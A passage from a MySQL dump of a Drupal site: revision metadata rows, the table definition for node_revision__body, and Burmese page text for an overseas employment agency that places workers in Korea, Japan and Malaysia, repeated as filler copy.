(27, 273, 'en', 1, 1690605069, NULL, 1),
(23, 274, 'en', 1, 1690609876, NULL, 1),
(23, 275, 'en', 1, 1690609912, NULL, 1),
(23, 276, 'en', 1, 1690609942, NULL, 1),
(24, 277, 'en', 1, 1690775221, NULL, 1),
(24, 278, 'en', 1, 1690781869, NULL, 1),
(24, 279, 'en', 1, 1690781893, NULL, 1),
(25, 280, 'en', 1, 1690782429, NULL, 1),
(25, 281, 'en', 1, 1690782457, NULL, 1),
(25, 282, 'en', 1, 1690782479, NULL, 1),
(25, 283, 'en', 1, 1690782708, NULL, 1),
(25, 284, 'en', 1, 1690782722, NULL, 1),
(25, 285, 'en', 1, 1690782774, NULL, 1),
(25, 286, 'en', 1, 1690782799, NULL, 1),
(25, 287, 'en', 1, 1690782855, NULL, 1),
(7, 288, 'en', 1, 1690783384, NULL, 1),
(11, 289, 'en', 1, 1690956144, NULL, 1),
(11, 290, 'en', 1, 1690956179, NULL, 1),
(11, 291, 'en', 1, 1690956203, NULL, 1),
(23, 292, 'en', 1, 1691032362, NULL, 1),
(23, 293, 'en', 1, 1691032414, NULL, 1),
(23, 294, 'en', 1, 1691032457, NULL, 1),
(23, 295, 'en', 1, 1691474331, NULL, 1),
(23, 296, 'en', 1, 1691474463, NULL, 1),
(23, 297, 'en', 1, 1691474590, NULL, 1),
(23, 298, 'en', 1, 1691560518, NULL, 1),
(23, 299, 'en', 1, 1691560565, NULL, 1),
(23, 300, 'en', 1, 1691560610, NULL, 1),
(24, 301, 'en', 1, 1691560671, NULL, 1),
(24, 302, 'en', 1, 1691560713, NULL, 1),
(24, 303, 'en', 1, 1691560763, NULL, 1),
(23, 304, 'en', 1, 1692068546, NULL, 1),
(23, 305, 'en', 1, 1692068740, NULL, 1),
(23, 306, 'en', 1, 1692068891, NULL, 1),
(26, 307, 'en', 1, 1692069077, NULL, 1),
(26, 308, 'en', 1, 1692069113, NULL, 1),
(26, 309, 'en', 1, 1692069142, NULL, 1),
(24, 310, 'en', 1, 1692069243, NULL, 1),
(24, 311, 'en', 1, 1692069330, NULL, 1),
(24, 312, 'en', 1, 1692069414, NULL, 1),
(24, 313, 'en', 1, 1692069461, NULL, 1),
(11, 314, 'en', 1, 1692240899, NULL, 1),
(5, 315, 'en', 2, 1692248647, NULL, 1),
(10, 316, 'en', 2, 1692248661, NULL, 1),
(18, 317, 'en', 2, 1692248676, NULL, 1),
(5, 318, 'en', 2, 1692249018, NULL, 1),
(5, 319, 'en', 2, 1692249072, NULL, 1),
(18, 320, 'en', 2, 1692249082, NULL, 1),
(10, 321, 'en', 2, 1692249091, NULL, 1),
(5, 322, 'en', 1, 1692249889, NULL, 1),
(5, 323, 'en', 1, 1692249962, NULL, 1),
(5, 324, 'en', 1, 1692250406, NULL, 1),
(5, 325, 'en', 2, 1692250554, NULL, 1),
(5, 326, 'en', 2, 1692250660, NULL, 1),
(18, 336, 'en', 2, 1692254337, NULL, 1),
(18, 337, 'en', 2, 1692254414, NULL, 1),
(18, 338, 'en', 2, 1692254441, NULL, 1),
(10, 339, 'en', 2, 1692254623, NULL, 1),
(5, 340, 'en', 2, 1692254677, NULL, 1),
(18, 357, 'en', 2, 1692280481, NULL, 1),
(10, 358, 'en', 2, 1692280580, NULL, 1),
(5, 359, 'en', 2, 1692280669, NULL, 1),
(62, 378, 'ja', 1, 1692940476, NULL, 1),
(62, 382, 'ja', 1, 1692940641, NULL, 1),
(62, 383, 'ja', 2, 1692940670, NULL, 1),
(62, 392, 'ja', 1, 1692941453, NULL, 1),
(62, 395, 'ja', 1, 1692941584, NULL, 1),
(62, 396, 'ja', 1, 1692941971, NULL, 1),
(62, 397, 'ja', 1, 1692942279, NULL, 1),
(62, 398, 'ja', 1, 1692942680, NULL, 1),
(62, 399, 'ja', 1, 1692947061, NULL, 1),
(62, 400, 'ja', 1, 1692947360, NULL, 1),
(62, 401, 'ja', 1, 1692947406, NULL, 1),
(62, 402, 'ja', 1, 1692947515, NULL, 1),
(62, 403, 'ja', 1, 1692947683, NULL, 1),
(62, 404, 'ja', 1, 1692952315, NULL, 1),
(62, 405, 'ja', 1, 1692952380, NULL, 1),
(62, 406, 'ja', 1, 1693194221, NULL, 1),
(62, 407, 'ja', 1, 1693194347, NULL, 1),
(62, 408, 'ja', 1, 1693194414, NULL, 1),
(62, 409, 'ja', 1, 1693194768, NULL, 1),
(24, 411, 'en', 1, 1693623429, NULL, 1),
(24, 412, 'en', 1, 1693623453, NULL, 1),
(24, 413, 'en', 1, 1693623472, NULL, 1),
(66, 418, 'en', 1, 1707206926, NULL, 1),
(67, 419, 'ja', 1, 1707212568, NULL, 1),
(66, 420, 'en', 2, 1713156227, NULL, 1),
(67, 421, 'ja', 2, 1713156247, NULL, 1),
(68, 422, 'en', 1, 1719290854, NULL, 1),
(68, 423, 'en', 1, 1719291143, NULL, 1),
(68, 424, 'en', 1, 1719291332, NULL, 1),
(69, 425, 'ja', 1, 1719292191, NULL, 1),
(69, 426, 'ja', 1, 1719292567, NULL, 1),
(70, 427, 'en', 1, 1719296098, NULL, 1),
(71, 428, 'en', 1, 1719296146, NULL, 1),
(71, 429, 'en', 1, 1719296385, NULL, 1),
(70, 430, 'en', 1, 1719296559, NULL, 1),
(71, 431, 'en', 1, 1719296751, NULL, 1),
(72, 432, 'en', 1, 1719297437, NULL, 1),
(72, 433, 'en', 1, 1719297515, NULL, 1),
(72, 434, 'en', 1, 1719297635, NULL, 1),
(72, 435, 'en', 1, 1719297741, NULL, 1),
(73, 436, 'en', 1, 1719297947, NULL, 1),
(74, 437, 'en', 1, 1719298045, NULL, 1),
(74, 438, 'en', 1, 1719298434, NULL, 1),
(73, 439, 'en', 1, 1719298494, NULL, 1),
(74, 440, 'en', 1, 1719298533, NULL, 1),
(75, 441, 'en', 1, 1719301473, NULL, 1),
(75, 442, 'en', 1, 1719301670, NULL, 1),
(75, 443, 'en', 1, 1719301811, NULL, 1),
(75, 444, 'en', 1, 1719301861, NULL, 1),
(76, 445, 'en', 1, 1719301871, NULL, 1),
(75, 446, 'en', 1, 1719301916, NULL, 1),
(76, 447, 'en', 1, 1719301957, NULL, 1),
(75, 448, 'en', 1, 1719301974, NULL, 1),
(77, 449, 'en', 1, 1719305316, NULL, 1),
(77, 450, 'en', 1, 1719305714, NULL, 1),
(78, 451, 'en', 1, 1719306699, NULL, 1),
(78, 452, 'en', 1, 1719306801, NULL, 1),
(79, 453, 'en', 1, 1719308229, NULL, 1),
(80, 454, 'en', 1, 1719309084, NULL, 1),
(80, 455, 'en', 1, 1719309239, NULL, 1),
(81, 456, 'en', 1, 1719309533, NULL, 1),
(81, 457, 'en', 1, 1719309613, NULL, 1),
(82, 458, 'en', 1, 1719311486, NULL, 1),
(82, 459, 'en', 1, 1719311707, NULL, 1),
(83, 460, 'en', 1, 1719311899, NULL, 1),
(84, 461, 'en', 1, 1719312126, NULL, 1),
(85, 462, 'en', 1, 1719312138, NULL, 1),
(85, 463, 'en', 1, 1719312207, NULL, 1),
(83, 464, 'en', 1, 1719312245, NULL, 1),
(84, 465, 'en', 1, 1719312476, NULL, 1),
(86, 466, 'en', 1, 1719312687, NULL, 1),
(86, 467, 'en', 1, 1719312873, NULL, 1),
(87, 468, 'ja', 1, 1719313107, NULL, 1),
(87, 469, 'ja', 1, 1719313146, NULL, 1),
(88, 470, 'en', 1, 1719313150, NULL, 1),
(88, 471, 'en', 1, 1719313203, NULL, 1),
(89, 472, 'en', 1, 1719313467, NULL, 1),
(89, 473, 'en', 1, 1719313506, NULL, 1),
(90, 474, 'en', 1, 1719313514, NULL, 1),
(90, 475, 'en', 1, 1719313640, NULL, 1),
(87, 476, 'ja', 1, 1719313680, NULL, 1),
(90, 477, 'en', 1, 1719313769, NULL, 1),
(90, 478, 'en', 1, 1719313797, NULL, 1),
(91, 479, 'en', 1, 1719313857, NULL, 1),
(91, 480, 'en', 1, 1719313914, NULL, 1),
(92, 481, 'en', 1, 1719314184, NULL, 1),
(92, 482, 'en', 1, 1719314223, NULL, 1),
(93, 483, 'en', 1, 1719314643, NULL, 1),
(93, 484, 'en', 1, 1719314714, NULL, 1),
(94, 485, 'en', 1, 1719315003, NULL, 1),
(95, 486, 'en', 1, 1719315576, NULL, 1),
(95, 487, 'en', 1, 1719315692, NULL, 1),
(96, 488, 'en', 1, 1719315929, NULL, 1),
(96, 489, 'en', 1, 1719316010, NULL, 1),
(97, 490, 'en', 1, 1719316438, NULL, 1),
(97, 491, 'en', 1, 1719316533, NULL, 1),
(98, 492, 'en', 1, 1719316566, NULL, 1),
(98, 493, 'en', 1, 1719316648, NULL, 1),
(99, 494, 'en', 1, 1719316788, NULL, 1),
(99, 495, 'en', 1, 1719316846, NULL, 1),
(100, 496, 'en', 1, 1719383465, NULL, 1),
(100, 497, 'en', 1, 1719386107, NULL, 1),
(101, 498, 'en', 1, 1719393267, NULL, 1),
(101, 499, 'en', 1, 1719393363, NULL, 1),
(102, 500, 'en', 1, 1719393839, NULL, 1),
(102, 501, 'en', 1, 1719394008, NULL, 1),
(103, 502, 'en', 1, 1719394260, NULL, 1),
(104, 503, 'en', 1, 1719394273, NULL, 1),
(104, 504, 'en', 1, 1719394347, NULL, 1),
(103, 505, 'en', 1, 1719394403, NULL, 1),
(105, 506, 'en', 1, 1719394775, NULL, 1),
(105, 507, 'en', 1, 1719394942, NULL, 1),
(106, 508, 'en', 1, 1719395347, NULL, 1),
(106, 509, 'en', 1, 1719395406, NULL, 1),
(107, 510, 'en', 1, 1719395840, NULL, 1),
(107, 511, 'en', 1, 1719395931, NULL, 1),
(108, 512, 'en', 1, 1719396059, NULL, 1),
(108, 513, 'en', 1, 1719396095, NULL, 1),
(109, 514, 'en', 1, 1719396241, NULL, 1),
(109, 515, 'en', 1, 1719396373, NULL, 1),
(110, 516, 'en', 1, 1719396713, NULL, 1),
(110, 517, 'en', 1, 1719396790, NULL, 1),
(111, 518, 'en', 1, 1719397202, NULL, 1),
(111, 519, 'en', 1, 1719397256, NULL, 1),
(112, 520, 'en', 1, 1719397446, NULL, 1),
(112, 521, 'en', 1, 1719397518, NULL, 1),
(113, 522, 'en', 1, 1719397758, NULL, 1),
(113, 523, 'en', 1, 1719397829, NULL, 1),
(95, 524, 'en', 1, 1719398112, NULL, 1),
(114, 525, 'en', 1, 1719398127, NULL, 1),
(114, 526, 'en', 1, 1719398189, NULL, 1),
(115, 527, 'en', 1, 1719398759, NULL, 1),
(115, 528, 'en', 1, 1719398849, NULL, 1),
(116, 529, 'en', 1, 1719399020, NULL, 1),
(117, 530, 'en', 1, 1719399089, NULL, 1),
(116, 531, 'en', 1, 1719399098, NULL, 1),
(117, 532, 'en', 1, 1719399137, NULL, 1),
(118, 533, 'en', 1, 1719399288, NULL, 1),
(118, 534, 'en', 1, 1719399332, NULL, 1),
(119, 535, 'ja', 1, 1719399522, NULL, 1),
(119, 536, 'en', 1, 1719399541, NULL, 1),
(119, 537, 'en', 1, 1719399593, NULL, 1),
(120, 538, 'en', 1, 1719399673, NULL, 1),
(120, 539, 'en', 1, 1719399772, NULL, 1),
(121, 540, 'en', 1, 1719399822, NULL, 1),
(121, 541, 'en', 1, 1719399874, NULL, 1),
(122, 542, 'en', 1, 1719400071, NULL, 1),
(123, 543, 'en', 1, 1719400104, NULL, 1),
(122, 544, 'en', 1, 1719400141, NULL, 1),
(123, 545, 'en', 1, 1719400152, NULL, 1),
(124, 546, 'en', 1, 1719400494, NULL, 1),
(124, 547, 'en', 1, 1719400540, NULL, 1),
(125, 548, 'en', 1, 1719400764, NULL, 1),
(125, 549, 'en', 1, 1719400826, NULL, 1),
(126, 550, 'en', 1, 1719400850, NULL, 1),
(126, 551, 'en', 1, 1719400888, NULL, 1),
(127, 552, 'en', 1, 1719401072, NULL, 1),
(127, 553, 'en', 1, 1719401205, NULL, 1),
(128, 554, 'en', 1, 1719401644, NULL, 1),
(128, 555, 'en', 1, 1719401682, NULL, 1),
(129, 556, 'en', 1, 1719401937, NULL, 1),
(129, 557, 'en', 1, 1719401970, NULL, 1),
(130, 558, 'en', 1, 1719402459, NULL, 1),
(130, 559, 'en', 1, 1719402486, NULL, 1),
(131, 560, 'en', 1, 1719402599, NULL, 1),
(131, 561, 'en', 1, 1719402630, NULL, 1),
(132, 562, 'en', 1, 1719478348, NULL, 1),
(132, 563, 'en', 1, 1719478496, NULL, 1),
(133, 564, 'en', 1, 1719478939, NULL, 1),
(133, 565, 'en', 1, 1719479062, NULL, 1),
(134, 566, 'en', 1, 1719479159, NULL, 1),
(134, 567, 'en', 1, 1719479280, NULL, 1),
(135, 568, 'en', 1, 1719479477, NULL, 1),
(135, 569, 'en', 1, 1719479538, NULL, 1),
(136, 570, 'en', 1, 1719479945, NULL, 1),
(136, 571, 'en', 1, 1719479981, NULL, 1),
(137, 572, 'en', 1, 1719480092, NULL, 1),
(137, 573, 'en', 1, 1719480194, NULL, 1),
(138, 574, 'en', 1, 1719480344, NULL, 1),
(138, 575, 'en', 1, 1719480376, NULL, 1),
(139, 576, 'en', 1, 1719480485, NULL, 1),
(139, 577, 'en', 1, 1719480567, NULL, 1),
(140, 578, 'en', 1, 1719481095, NULL, 1),
(140, 579, 'en', 1, 1719481142, NULL, 1),
(141, 580, 'en', 1, 1719481555, NULL, 1),
(141, 581, 'en', 1, 1719481622, NULL, 1),
(142, 582, 'en', 1, 1719481973, NULL, 1),
(142, 583, 'en', 1, 1719482002, NULL, 1),
(143, 584, 'en', 1, 1719482114, NULL, 1),
(143, 585, 'en', 1, 1719482168, NULL, 1),
(144, 586, 'en', 1, 1719482748, NULL, 1),
(144, 587, 'en', 1, 1719482843, NULL, 1),
(145, 588, 'en', 1, 1719568930, NULL, 1),
(145, 589, 'en', 1, 1719568967, NULL, 1),
(146, 590, 'en', 1, 1719571760, NULL, 1),
(146, 591, 'en', 1, 1719571826, NULL, 1),
(146, 592, 'en', 1, 1719571929, NULL, 1),
(146, 593, 'en', 1, 1719572063, NULL, 1),
(147, 594, 'en', 1, 1719635012, NULL, 1),
(147, 595, 'en', 1, 1719635105, NULL, 1),
(148, 596, 'en', 1, 1719906578, NULL, 1),
(148, 597, 'en', 1, 1719906615, NULL, 1),
(149, 598, 'en', 1, 1720081343, NULL, 1),
(150, 599, 'en', 1, 1720082602, NULL, 1),
(150, 600, 'en', 1, 1720082636, NULL, 1),
(151, 601, 'en', 1, 1720082985, NULL, 1),
(151, 602, 'en', 1, 1720083010, NULL, 1),
(152, 603, 'en', 1, 1720246640, NULL, 1),
(152, 604, 'en', 1, 1720246679, NULL, 1),
(153, 605, 'en', 1, 1720437572, NULL, 1),
(153, 606, 'en', 1, 1720437640, NULL, 1),
(154, 607, 'en', 1, 1781849669, NULL, 1),
(154, 608, 'en', 1, 1781849924, NULL, 1),
(154, 609, 'en', 1, 1781850087, NULL, 1),
(155, 610, 'en', 1, 1781850827, NULL, 1),
(155, 611, 'en', 1, 1781853362, NULL, 1),
(156, 612, 'en', 1, 1781854366, NULL, 1),
(156, 613, 'en', 1, 1781854408, NULL, 1),
(157, 614, 'ja', 1, 1781854808, NULL, 1),
(157, 615, 'ja', 1, 1781854858, NULL, 1),
(160, 620, 'en', 1, 1781857812, NULL, 1),
(160, 621, 'en', 1, 1781857849, NULL, 1),
(161, 622, 'ja', 1, 1781857975, NULL, 1),
(161, 623, 'ja', 1, 1781858020, NULL, 1),
(162, 624, 'en', 1, 1781859579, NULL, 1),
(162, 625, 'en', 1, 1781859626, NULL, 1),
(163, 626, 'en', 1, 1781860124, NULL, 1),
(163, 627, 'en', 1, 1781860170, NULL, 1),
(164, 628, 'en', 1, 1781861026, NULL, 1),
(164, 629, 'en', 1, 1781861065, NULL, 1),
(165, 630, 'en', 1, 1781861523, NULL, 1),
(165, 631, 'en', 1, 1781861571, NULL, 1),
(166, 632, 'ja', 1, 1781861886, NULL, 1),
(166, 633, 'en', 1, 1781861912, NULL, 1),
(166, 634, 'en', 1, 1781861949, NULL, 1),
(167, 635, 'en', 1, 1781862136, NULL, 1),
(167, 636, 'en', 1, 1781862182, NULL, 1),
(168, 637, 'en', 1, 1781862436, NULL, 1),
(168, 638, 'en', 1, 1781862475, NULL, 1),
(169, 639, 'en', 1, 1781862777, NULL, 1),
(169, 640, 'en', 1, 1781862822, NULL, 1),
(170, 641, 'en', 1, 1781864070, NULL, 1),
(170, 642, 'en', 1, 1781864161, NULL, 1),
(171, 643, 'en', 1, 1781864827, NULL, 1),
(171, 644, 'en', 1, 1781864863, NULL, 1),
(173, 647, 'en', 1, 1781865730, NULL, 1),
(173, 648, 'en', 1, 1781865800, NULL, 1),
(174, 649, 'en', 1, 1781866082, NULL, 1),
(174, 650, 'en', 1, 1781866126, NULL, 1),
(175, 651, 'en', 1, 1781866452, NULL, 1),
(175, 652, 'en', 1, 1781866535, NULL, 1),
(176, 653, 'en', 1, 1781866853, NULL, 1),
(176, 654, 'en', 1, 1781867363, NULL, 1),
(177, 655, 'en', 1, 1781867563, NULL, 1),
(177, 656, 'en', 1, 1781867606, NULL, 1),
(161, 657, 'ja', 1, 1781868026, NULL, 1),
(161, 658, 'ja', 1, 1781868044, NULL, 1),
(161, 659, 'ja', 1, 1781868082, NULL, 1),
(160, 660, 'en', 1, 1781868119, NULL, 1),
(178, 661, 'en', 1, 1781868217, NULL, 1),
(178, 662, 'en', 1, 1781869820, NULL, 1),
(179, 663, 'en', 1, 1781870011, NULL, 1),
(179, 664, 'en', 1, 1781870056, NULL, 1),
(180, 665, 'ja', 1, 1781870184, NULL, 1),
(180, 666, 'en', 1, 1781870198, NULL, 1),
(180, 667, 'en', 1, 1781870229, NULL, 1),
(181, 668, 'en', 1, 1781870377, NULL, 1),
(181, 669, 'en', 1, 1781870480, NULL, 1),
(182, 670, 'en', 1, 1781870596, NULL, 1),
(182, 671, 'en', 1, 1781870629, NULL, 1),
(183, 672, 'en', 1, 1781870746, NULL, 1),
(183, 673, 'en', 1, 1781870783, NULL, 1),
(184, 674, 'en', 1, 1781871015, NULL, 1),
(184, 675, 'en', 1, 1781871059, NULL, 1),
(185, 676, 'en', 1, 1781871245, NULL, 1),
(185, 677, 'en', 1, 1781871263, NULL, 1),
(185, 678, 'en', 1, 1781871303, NULL, 1),
(186, 679, 'en', 1, 1781871431, NULL, 1),
(186, 680, 'en', 1, 1781871464, NULL, 1),
(187, 681, 'en', 1, 1781927919, NULL, 1),
(187, 682, 'en', 1, 1781927973, NULL, 1),
(188, 683, 'en', 1, 1781929622, NULL, 1),
(188, 684, 'en', 1, 1781929703, NULL, 1),
(189, 685, 'en', 1, 1781930057, NULL, 1),
(189, 686, 'en', 1, 1781931678, NULL, 1),
(190, 687, 'en', 1, 1781932120, NULL, 1),
(190, 688, 'en', 1, 1781932181, NULL, 1),
(190, 689, 'en', 1, 1781932260, NULL, 1),
(191, 690, 'en', 1, 1781932388, NULL, 1),
(191, 691, 'en', 1, 1781932417, NULL, 1),
(192, 692, 'en', 1, 1781932531, NULL, 1),
(192, 693, 'en', 1, 1781932608, NULL, 1),
(193, 694, 'en', 1, 1781932755, NULL, 1),
(193, 695, 'en', 1, 1781932799, NULL, 1),
(193, 696, 'en', 1, 1781933525, NULL, 1),
(194, 697, 'en', 1, 1781936787, NULL, 1),
(194, 698, 'en', 1, 1781936828, NULL, 1),
(195, 699, 'en', 1, 1781937183, NULL, 1),
(195, 700, 'en', 1, 1781937232, NULL, 1),
(196, 701, 'en', 1, 1781937623, NULL, 1),
(196, 702, 'en', 1, 1781937768, NULL, 1),
(197, 703, 'en', 1, 1781938112, NULL, 1),
(197, 704, 'en', 1, 1781938160, NULL, 1),
(198, 705, 'en', 1, 1781938542, NULL, 1),
(198, 706, 'en', 1, 1781938704, NULL, 1),
(199, 707, 'en', 1, 1781938836, NULL, 1),
(199, 708, 'en', 1, 1781938891, NULL, 1),
(200, 709, 'en', 1, 1781939019, NULL, 1),
(200, 710, 'en', 1, 1781939058, NULL, 1),
(204, 715, 'ja', 2, 1787751259, NULL, 1),
(204, 716, 'ja', 2, 1787751526, NULL, 1),
(205, 717, 'ja', 2, 1787752396, NULL, 1),
(205, 718, 'ja', 2, 1787752649, NULL, 1),
(204, 719, 'ja', 2, 1787752667, NULL, 1),
(204, 720, 'ja', 2, 1787838595, NULL, 1),
(205, 721, 'ja', 2, 1787838627, NULL, 1),
(206, 722, 'ja', 2, 1787838829, NULL, 1),
(206, 723, 'ja', 2, 1787923046, NULL, 1);

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__body`
--

CREATE TABLE `node_revision__body` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `body_value` longtext NOT NULL,
  `body_summary` longtext,
  `body_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field body.';

--
-- Dumping data for table `node_revision__body`
--

INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 1, 'en', 0, '<h3>ကြယ်တံခွန်သစ် ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးမှ ကြိုဆိုပါသည်။</h3><img src=\"/new_comet/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><br>ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။</p><p>ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။</p><p>ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင်ရှာဖွေရေးကုမ္မဏီဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္မဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။</p>', '', 'full_html'),
('page', 0, 1, 2, 'en', 0, '<h3>ကြယ်တံခွန်သစ် ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးမှ ကြိုဆိုပါသည်။</h3><img src=\"/new_comet/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><br>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ 